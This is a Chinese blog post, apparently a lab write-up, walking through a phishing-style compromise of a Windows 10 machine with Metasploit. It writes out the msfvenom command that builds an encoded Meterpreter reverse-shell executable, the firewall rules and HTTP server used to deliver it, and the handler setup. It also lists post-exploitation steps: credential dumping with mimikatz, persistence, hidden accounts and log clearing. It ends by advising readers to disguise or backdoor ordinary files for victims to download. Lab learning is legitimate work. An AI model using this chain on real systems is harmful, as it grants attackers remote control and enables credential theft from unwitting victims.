发布时间:2026/7/13 16:42:36
钓鱼渗透测试实验复现 钓鱼渗透测试实验复现用途网络安全学习分享仅限授权环境测试一、实验环境角色系统/工具IP地址攻击机Windows 11矛盾武器库10.0.0.166靶机Windows 10 x6410.0.0.153攻击机Windows 11 Penetration Suite Toolkit - VMware Workstation矛盾武器库可以去下载靶机普通win10 X64二、实验原理本次实验采用「后门植入 反向连接」的经典渗透链路MSFvenom生成带有反向 Shell 的 Payload可执行文件。攻击机开启 HTTP 服务供靶机下载 Payload。MSFconsole Handler在攻击机监听指定端口等待靶机上线。靶机执行 Payload后Meterpreter 会话建立进入后渗透阶段。三、实验步骤关闭靶机防火墙互相ping网段测试链接靶机ping攻击机攻击机ping靶机生成payload攻击机使用MSF矛盾武器库自带无需额外下载分为MSFvenom和MSFconsolemsfvenom 生成 payloadmsfconsole 多模块后续操作先用msfvenom生成payload在桌面msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST10.0.0.166 LPORT4444 -e x64/xor_dynamic -i 5 -f exe -o C:\Users\Administrator\Desktop\shell.exe然后新开一个窗口打开攻击机的8080端口让靶机能够正常访问netsh advfirewall firewall add rule nameHTTP_8080 dirin actionallow protocoltcp localport8080还有4444端口后面也会用到netsh advfirewall firewall add rule nameMSF_4444 dirin actionallow protocoltcp localport4444在桌面开启http服务python3 -m http.server 8080打开MSFconsole命令行输入banner查看信息和各模块数量exploit漏洞攻击/利用模块auxiliary辅助模块信息收集、扫描、嗅探、指纹识别、口令猜解post后渗透模块获取目标系统的控制权以后进行的一系列攻击动作比如获取敏感信息、跳板攻击等paylods攻击代码或指令encoders加密模块对payload进行加密躲避杀毒软件的查杀nops提高和维持payload稳定性evasion高级免杀使用模块use exploit/multi/handler输入show options查看信息以下是配置信息set PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.0.0.166set LPORT 4444run正在监听然后我们切换到靶机来访问攻击机地址并下载shell.exe会被实时监测查杀我们做实验环境简单教学为主关闭实时保护现在下载下来执行文件返回攻击机可以发现已经成功连接靶机然后进输入shell可以运用靶机的shell窗口输入whoami发现我们是管理员账户实验环境靶机登陆的就是管理员现在截张靶机图片成功拿下关闭攻击机实验开放窗口netsh advfirewall firewall delete rule nameHTTP_8080netsh advfirewall firewall delete rule nameMSF_4444结尾正常渗透后应该是普通用户先进行信息搜集再提升权限凭证获取权限维持横向移动做完清理痕迹不做演示。信息搜集sysinfo、getuid、ps、ipconfig、route权限提升getsystem、local_exploit_suggester凭证获取hashdump、kiwi/mimikatz明文密码权限维持persistence、注册表后门、添加隐藏用户横向移动route add socks_proxy 跳板进内网痕迹清理clearev、删除后门账户与文件万变不离其宗钓鱼的办法就是伪装正常文件或在正常文件添加后门让对方下载使用方法多样自行发挥。以上仅作学习分享。

相关新闻

2026/7/13 16:37:36

MLX框架下的Laguna-M.1-4bit部署指南:从零到生产环境

MLX框架下的Laguna-M.1-4bit部署指南:从零到生产环境 【免费下载链接】Laguna-M.1-4bit 项目地址: https://ai.gitcode.com/hf_mirrors/mlx-community/Laguna-M.1-4bit 欢迎来到MLX框架下的Laguna-M.1-4bit部署终极指南!🎉 本文将带你…

2026/7/13 17:37:43

Godot GPU粒子系统实战:从原理到复杂魔法漩涡特效实现

1. 项目概述:为什么我们需要GPU粒子系统?如果你在Godot里做过特效,肯定对CPUParticles3D不陌生。它简单、直观,但当你需要成千上万的粒子来模拟一场暴风雪、一片星海,或者魔法爆炸后四散的余烬时,CPU粒子就…

2026/7/13 6:38:38

3步解锁音乐自由:ncmdumpGUI终极NCM文件解密转换指南

3步解锁音乐自由:ncmdumpGUI终极NCM文件解密转换指南 【免费下载链接】ncmdumpGUI C#版本网易云音乐ncm文件格式转换,Windows图形界面版本 项目地址: https://gitcode.com/gh_mirrors/nc/ncmdumpGUI 你是否曾在网易云音乐下载了心爱的歌曲&#…

2026/7/13 14:26:14

CANoe 19 SP3 配置 GB/T 27930-2023 A类系统:3步搭建BMS仿真测试环境

CANoe 19 SP3 配置 GB/T 27930-2023 A类系统:3步搭建BMS仿真测试环境随着新能源汽车行业的快速发展,充电通信协议的标准化和测试验证变得尤为重要。GB/T 27930-2023作为中国智能充电协议的最新版本,对充电机与电动汽车之间的通信提出了更严格…

2026/7/12 0:01:29

3步搞定RTL8852BE驱动:从零开始配置Wi-Fi 6网卡

3步搞定RTL8852BE驱动:从零开始配置Wi-Fi 6网卡 【免费下载链接】rtl8852be Realtek Linux WLAN Driver for RTL8852BE 项目地址: https://gitcode.com/gh_mirrors/rt/rtl8852be 还在为Linux系统无法识别RTL8852BE Wi-Fi 6网卡而烦恼吗?&#x1f…

2026/7/13 0:00:24

广氟 PTFE 高速线缆膜 —— 高端线缆绝缘材料新选择

PTFE高速线缆膜的基本概念与特点 PTFE 高速线缆膜是以聚四氟乙烯树脂为原料,经膨化双向拉伸制成的多孔绝缘薄膜,作为高速高频通信线缆的核心介质材料,内部形成均匀连通的微孔结构,兼具极低介电常数与介电损耗,能有效降…

2026/7/13 11:33:05

3个高效策略:快速掌握Axure中文界面配置

3个高效策略:快速掌握Axure中文界面配置 【免费下载链接】axure-cn Chinese language file for Axure RP. Axure RP 简体中文语言包。支持 Axure 11、10、9。不定期更新。 项目地址: https://gitcode.com/gh_mirrors/ax/axure-cn 还在为Axure RP的英文界面感…